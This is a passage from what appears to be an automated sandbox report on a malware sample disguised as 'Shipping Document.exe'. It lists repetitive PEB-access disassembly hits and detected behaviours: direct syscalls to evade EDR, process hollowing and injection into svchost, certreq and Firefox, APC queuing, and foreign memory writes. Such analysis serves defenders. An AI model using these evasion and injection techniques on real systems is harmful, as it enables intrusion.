Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C6B40 mov eax, dword ptr fs:[00000030h]	2_2_030C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C6B40 mov eax, dword ptr fs:[00000030h]	2_2_030C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FAB40 mov eax, dword ptr fs:[00000030h]	2_2_030FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D8B42 mov eax, dword ptr fs:[00000030h]	2_2_030D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03028B50 mov eax, dword ptr fs:[00000030h]	2_2_03028B50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DEB50 mov eax, dword ptr fs:[00000030h]	2_2_030DEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302CB7E mov eax, dword ptr fs:[00000030h]	2_2_0302CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040BBE mov eax, dword ptr fs:[00000030h]	2_2_03040BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040BBE mov eax, dword ptr fs:[00000030h]	2_2_03040BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_030E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_030E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h]	2_2_03050BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h]	2_2_03050BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h]	2_2_03050BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h]	2_2_03030BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h]	2_2_03030BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h]	2_2_03030BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DEBD0 mov eax, dword ptr fs:[00000030h]	2_2_030DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h]	2_2_03038BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h]	2_2_03038BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h]	2_2_03038BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305EBFC mov eax, dword ptr fs:[00000030h]	2_2_0305EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BCBF0 mov eax, dword ptr fs:[00000030h]	2_2_030BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BCA11 mov eax, dword ptr fs:[00000030h]	2_2_030BCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306CA24 mov eax, dword ptr fs:[00000030h]	2_2_0306CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305EA2E mov eax, dword ptr fs:[00000030h]	2_2_0305EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03054A35 mov eax, dword ptr fs:[00000030h]	2_2_03054A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03054A35 mov eax, dword ptr fs:[00000030h]	2_2_03054A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306CA38 mov eax, dword ptr fs:[00000030h]	2_2_0306CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]	2_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]	2_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]	2_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]	2_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]	2_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]	2_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]	2_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040A5B mov eax, dword ptr fs:[00000030h]	2_2_03040A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040A5B mov eax, dword ptr fs:[00000030h]	2_2_03040A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h]	2_2_0306CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h]	2_2_0306CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h]	2_2_0306CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DEA60 mov eax, dword ptr fs:[00000030h]	2_2_030DEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030ACA72 mov eax, dword ptr fs:[00000030h]	2_2_030ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030ACA72 mov eax, dword ptr fs:[00000030h]	2_2_030ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]	2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]	2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]	2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]	2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]	2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]	2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]	2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]	2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]	2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03104A80 mov eax, dword ptr fs:[00000030h]	2_2_03104A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03068A90 mov edx, dword ptr fs:[00000030h]	2_2_03068A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03038AA0 mov eax, dword ptr fs:[00000030h]	2_2_03038AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03038AA0 mov eax, dword ptr fs:[00000030h]	2_2_03038AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03086AA4 mov eax, dword ptr fs:[00000030h]	2_2_03086AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h]	2_2_03086ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h]	2_2_03086ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h]	2_2_03086ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03030AD0 mov eax, dword ptr fs:[00000030h]	2_2_03030AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03064AD0 mov eax, dword ptr fs:[00000030h]	2_2_03064AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03064AD0 mov eax, dword ptr fs:[00000030h]	2_2_03064AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306AAEE mov eax, dword ptr fs:[00000030h]	2_2_0306AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306AAEE mov eax, dword ptr fs:[00000030h]	2_2_0306AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE908 mov eax, dword ptr fs:[00000030h]	2_2_030AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE908 mov eax, dword ptr fs:[00000030h]	2_2_030AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BC912 mov eax, dword ptr fs:[00000030h]	2_2_030BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03028918 mov eax, dword ptr fs:[00000030h]	2_2_03028918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03028918 mov eax, dword ptr fs:[00000030h]	2_2_03028918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B892A mov eax, dword ptr fs:[00000030h]	2_2_030B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C892B mov eax, dword ptr fs:[00000030h]	2_2_030C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B0946 mov eax, dword ptr fs:[00000030h]	2_2_030B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03104940 mov eax, dword ptr fs:[00000030h]	2_2_03104940
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03056962 mov eax, dword ptr fs:[00000030h]	2_2_03056962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03056962 mov eax, dword ptr fs:[00000030h]	2_2_03056962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03056962 mov eax, dword ptr fs:[00000030h]	2_2_03056962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0307096E mov eax, dword ptr fs:[00000030h]	2_2_0307096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0307096E mov edx, dword ptr fs:[00000030h]	2_2_0307096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0307096E mov eax, dword ptr fs:[00000030h]	2_2_0307096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D4978 mov eax, dword ptr fs:[00000030h]	2_2_030D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D4978 mov eax, dword ptr fs:[00000030h]	2_2_030D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BC97C mov eax, dword ptr fs:[00000030h]	2_2_030BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030309AD mov eax, dword ptr fs:[00000030h]	2_2_030309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030309AD mov eax, dword ptr fs:[00000030h]	2_2_030309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B89B3 mov esi, dword ptr fs:[00000030h]	2_2_030B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B89B3 mov eax, dword ptr fs:[00000030h]	2_2_030B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B89B3 mov eax, dword ptr fs:[00000030h]	2_2_030B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C69C0 mov eax, dword ptr fs:[00000030h]	2_2_030C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030649D0 mov eax, dword ptr fs:[00000030h]	2_2_030649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FA9D3 mov eax, dword ptr fs:[00000030h]	2_2_030FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BE9E0 mov eax, dword ptr fs:[00000030h]	2_2_030BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030629F9 mov eax, dword ptr fs:[00000030h]	2_2_030629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030629F9 mov eax, dword ptr fs:[00000030h]	2_2_030629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BC810 mov eax, dword ptr fs:[00000030h]	2_2_030BC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]	2_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]	2_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]	2_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03052835 mov ecx, dword ptr fs:[00000030h]	2_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]	2_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]	2_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306A830 mov eax, dword ptr fs:[00000030h]	2_2_0306A830
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D483A mov eax, dword ptr fs:[00000030h]	2_2_030D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D483A mov eax, dword ptr fs:[00000030h]	2_2_030D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03042840 mov ecx, dword ptr fs:[00000030h]	2_2_03042840

Source: C:\Users\user\Desktop\Shipping Document.exe

Code function: 1_2_010181F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

1_2_010181F7

Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: 1_2_00FEA395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,		1_2_00FEA395
Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: 1_2_00FEA364 SetUnhandledExceptionFilter,		1_2_00FEA364

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe	NtWriteVirtualMemory: Direct from: 0x77762E3C	Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe	NtMapViewOfSection: Direct from: 0x77762D1C	Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe	NtNotifyChangeKey: Direct from: 0x77763C2C	Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe	NtCreateMutant: Direct from: 0x777635CC	Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe	NtResumeThread: Direct from: 0x777636AC	Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe	NtClose: Direct from: 0x77757B2E
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe	NtQuerySystemInformation: Direct from: 0x77762DFC	Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe	NtAllocateVirtualMemory: Direct from: 0x77762BFC	Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe	NtReadFile: Direct from: 0x77762ADC	Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe	NtDelayExecution: Direct from: 0x77762DDC	Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe	NtWriteVirtualMemory: Direct from: 0x7776490C	Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe	NtQueryInformationProcess: Direct from: 0x77762C26	Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe	NtResumeThread: Direct from: 0x77762FBC	Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe	NtCreateUserProcess: Direct from: 0x7776371C	Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe	NtSetInformationThread: Direct from: 0x777563F9	Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe	NtOpenKeyEx: Direct from: 0x77763C9C	Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe	NtSetInformationThread: Direct from: 0x77762B4C	Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe	NtQueryAttributesFile: Direct from: 0x77762E6C	Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe	NtClose: Direct from: 0x77762B6C
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe	NtReadVirtualMemory: Direct from: 0x77762E8C	Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe	NtCreateKey: Direct from: 0x77762C6C	Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe	NtQuerySystemInformation: Direct from: 0x777648CC	Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe	NtAllocateVirtualMemory: Direct from: 0x777648EC	Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe	NtQueryVolumeInformationFile: Direct from: 0x77762F2C	Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe	NtOpenSection: Direct from: 0x77762E0C	Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe	NtDeviceIoControlFile: Direct from: 0x77762AEC	Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe	NtQueryValueKey: Direct from: 0x77762BEC	Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe	NtQueryInformationToken: Direct from: 0x77762CAC	Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe	NtTerminateThread: Direct from: 0x77762FCC	Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe	NtCreateFile: Direct from: 0x77762FEC	Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe	NtOpenFile: Direct from: 0x77762DCC	Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe	NtOpenKeyEx: Direct from: 0x77762B9C	Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe	NtSetInformationProcess: Direct from: 0x77762C5C	Jump to behavior
Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe	NtProtectVirtualMemory: Direct from: 0x77762F9C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\Shipping Document.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\certreq.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe	Section loaded: NULL target: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe	Section loaded: NULL target: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\certreq.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\certreq.exe

Thread register set: target process: 3652

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\certreq.exe

Thread APC queued: target process: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Shipping Document.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 308008

Jump to behavior

Source: C:\Users\user\Desktop\Shipping Document.exe

Code function: 1_2_01018C93 LogonUserW,

1_2_01018C93

Source: C:\Users\user\Desktop\Shipping Document.exe

